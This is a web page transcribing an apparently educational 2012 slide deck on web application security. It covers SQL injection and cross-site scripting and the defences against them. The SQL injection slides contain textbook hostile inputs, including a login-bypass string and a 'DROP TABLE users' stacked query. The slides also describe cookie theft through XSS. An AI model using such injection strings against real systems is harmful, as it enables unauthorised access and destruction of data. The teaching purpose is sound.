Web Application Security

Similar documents
Exploits: XSS, SQLI, Buffer Overflow

Check list for web developers

Magento Security and Vulnerabilities. Roman Stepanov

Bug Report. Date: March 19, 2011 Reporter: Chris Jarabek

WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY

External Network & Web Application Assessment. For The XXX Group LLC October 2012

External Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION

Penetration Test Report

Data Breaches and Web Servers: The Giant Sucking Sound

BASELINE SECURITY TEST PLAN FOR EDUCATIONAL WEB AND MOBILE APPLICATIONS

Where every interaction matters.

The Top Web Application Attacks: Are you vulnerable?

Creating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011

Cross Site Scripting Prevention

Cross Site Scripting in Joomla Acajoom Component

Cracking the Perimeter via Web Application Hacking. Zach Grace, CISSP, CEH January 17, Mega Conference

Webapps Vulnerability Report

What is Web Security? Motivation

ArcGIS Server Security Threats & Best Practices David Cordes Michael Young

FINAL DoIT v.4 PAYMENT CARD INDUSTRY DATA SECURITY STANDARDS APPLICATION DEVELOPMENT AND MAINTENANCE PROCEDURES

Web applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh

Client Side Filter Enhancement using Web Proxy

Acunetix Website Audit. 5 November, Developer Report. Generated by Acunetix WVS Reporter (v8.0 Build )

OWASP AND APPLICATION SECURITY

Hack Proof Your Webapps

Web application security: Testing for vulnerabilities

Web Application Security Considerations

EVALUATING COMMERCIAL WEB APPLICATION SECURITY. By Aaron Parke

SECURE APPLICATION DEVELOPMENT CODING POLICY OCIO TABLE OF CONTENTS

Web Application Security. Vulnerabilities, Weakness and Countermeasures. Massimo Cotelli CISSP. Secure

Security Testing with Selenium

A Server and Browser-Transparent CSRF Defense for Web 2.0 Applications. Slides by Connor Schnaith

SQL INJECTION IN MYSQL

Preventing Abuse of Cookies Stolen by XSS

National Information Security Group The Top Web Application Hack Attacks. Danny Allan Director, Security Research

Web application security

Application Security Testing. Generic Test Strategy

Security features of ZK Framework

The purpose of this report is to educate our prospective clients about capabilities of Hackers Locked.

Introduction:... 1 Security in SDLC:... 2 Penetration Testing Methodology: Case Study... 3

Columbia University Web Security Standards and Practices. Objective and Scope

(WAPT) Web Application Penetration Testing

Security Awareness For Website Administrators. State of Illinois Central Management Services Security and Compliance Solutions

Recommended Practice Case Study: Cross-Site Scripting. February 2007

SECURITY ADVISORY. December 2008 Barracuda Load Balancer admin login Cross-site Scripting

Attack and Penetration Testing 101

CSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities

WHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats

SQL Injection January 23, 2013

Sitefinity Security and Best Practices

Common Security Vulnerabilities in Online Payment Systems

Using Foundstone CookieDigger to Analyze Web Session Management

1. Introduction. 2. Web Application. 3. Components. 4. Common Vulnerabilities. 5. Improving security in Web applications

WEB APPLICATION FIREWALLS: DO WE NEED THEM?

How to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering

EECS 398 Project 2: Classic Web Vulnerabilities

Hacking de aplicaciones Web

Rational AppScan & Ounce Products

Ruby on Rails Secure Coding Recommendations

Columbia University Web Application Security Standards and Practices. Objective and Scope

Cross-site site Scripting Attacks on Android WebView

HOD of Dept. of CSE & IT. Asst. Prof., Dept. Of CSE AIET, Lko, India. AIET, Lko, India

Web Security Testing Cookbook*

Nuclear Regulatory Commission Computer Security Office Computer Security Standard

1. What is SQL Injection?

What about MongoDB? can req.body.input 0; var date = new Date(); do {curdate = new Date();} while(curdate-date<10000)

Implementation of Web Application Security Solution using Open Source Gaurav Gupta 1, B. K. Murthy 2, P. N. Barwal 3

Enterprise Application Security Workshop Series

Thick Client Application Security

Conducting Web Application Pentests. From Scoping to Report For Education Purposes Only

Detecting and Exploiting XSS with Xenotix XSS Exploit Framework

Cross-Site Scripting

SESSION IDENTIFIER ARE FOR NOW, PASSWORDS ARE FOREVER

Network Security Exercise #8

Threat Modeling. Categorizing the nature and severity of system vulnerabilities. John B. Dickson, CISSP

Advanced Web Security, Lab

OWASP and OWASP Top 10 (2007 Update) OWASP. The OWASP Foundation. Dave Wichers. The OWASP Foundation. OWASP Conferences Chair

Still Aren't Doing. Frank Kim

Web Application Security Assessment and Vulnerability Mitigation Tests

Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security

5 Simple Steps to Secure Database Development

Advanced Web Technology 10) XSS, CSRF and SQL Injection 2

Project 2: Web Security Pitfalls

Web Application Attacks and Countermeasures: Case Studies from Financial Systems

3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management

Hack-proof Your Drupal App. Key Habits of Secure Drupal Coding

Network Threats and Vulnerabilities. Ed Crowley

WEB ATTACKS AND COUNTERMEASURES

OWASP Top Ten Tools and Tactics

WHITE PAPER FORTIWEB WEB APPLICATION FIREWALL. Ensuring Compliance for PCI DSS 6.5 and 6.6

Web Engineering Web Application Security Issues

Bank Hacking Live! Ofer Maor CTO, Hacktics Ltd. ATC-4, 12 Jun 2006, 4:30PM

Adobe Systems Incorporated

Members of the UK cyber security forum. Soteria Health Check. A Cyber Security Health Check for SAP systems

Transcription:

Web Application Security John Zaharopoulos ITS - Security 10/9/2012 1

Web App Security Trends Web 2.0 Dynamic Webpages Growth of Ajax / Client side Javascript Hardening of OSes Secure by default Auto-patching and Auto-updating 10/9/2012 2

Recent Successful Attacks Sony Pictures Stolen admin details and passwords 75,000 music codes LinkedIn 6 million password hashes eharmony 1.5 million password hashes Yahoo 450K passwords 10/9/2012 3

OWASP Top 10 Threats 10/9/2012 4

SQL Injection A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. 10/9/2012 5

SQL Injection Example 1 Code: $password = mysql_query("select password FROM users WHERE password = '". $pass. "';"); Attacker sends: ' OR 1 = 1 /* Result: SELECT password FROM users WHERE password = '' OR 1 = 1 /* 10/9/2012 6

SQL Injection Example 2 Code: statement := "SELECT * FROM userinfo WHERE id = " + a_variable + "; Attacker sends: 1;DROP TABLE users Result: SELECT * FROM userinfo WHERE id=1;drop TABLE users; 10/9/2012 7

SQL Injection Defense Prepared Statements (Parameterized Queries) - Parameterized queries force developers to define all the SQL code, then pass in each parameter to the query, which allows the database to distinguish between code and data, regardless of what input is supplied. Stored Procedures - a stored procedure is defined and stored in the database itself, and then called from the application rather than something that a user is allowed to enter. Escaping all User Supplied Input - Each DBMS supports one or more character escaping schemes specific to certain kinds of queries. If you then escape all user supplied input using the proper escaping scheme for the database you are using, the DBMS will not confuse that input with SQL code written by the developer, thus avoiding any possible SQL injection vulnerabilities. Least Privilege or minimizing the privileges assigned to every database account, so that users have enough permission to do their job, but no more. White List Input Validation - Input validation is used to detect unauthorized input before it is processed by the application, thereby preventing the attack 10/9/2012 8

Cross Side Scripting (XSS) Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web site. Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. 10/9/2012 9

XSS Example 1a Non-persistent / Reflected: Alice often visits a particular website, which is hosted by Bob. Bob's website allows Alice to log in with a username/password pair and stores sensitive data, such as billing information. Mallory observes that Bob's website contains a reflected XSS vulnerability. Mallory crafts a URL to exploit the vulnerability, and sends Alice an email, enticing her to click on a link for the URL under false pretenses. This URL will point to Bob's website (either directly or through an iframe or ajax), but will contain Mallory's malicious code, which the website will reflect. Alice visits the URL provided by Mallory while logged into Bob's website. The malicious script embedded in the URL executes in Alice's browser, as if it came directly from Bob's server (this is the actual XSS vulnerability). The script can be used to send Alice's session cookie to Mallory. Mallory can then use the session cookie to steal sensitive information available to Alice (authentication credentials, billing info, etc.) without Alice's knowledge. 10/9/2012 10

XSS Example 1b 10/9/2012 11

XSS Example 2 Persistent attack: Mallory posts a message with malicious payload to a social network. When Bob reads the message, Mallory's XSS steals Bob's cookie. Mallory can now hijack Bob's session and impersonate Bob. 10/9/2012 12

XSS Defense Escaping transforming the data in such a way that the browser will not interpret it as code characters like "<" and "&" should be rewritten as HTML entities -- "<" and "& Validation and filtering disallow users from entering special characters like <, or filter out those characters. 10/9/2012 13

Additional Resources OWASP http://www.owasp.org/ SANS Institute http://www.sans.org/ 10/9/2012 14

Questions? 10/9/2012 15

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information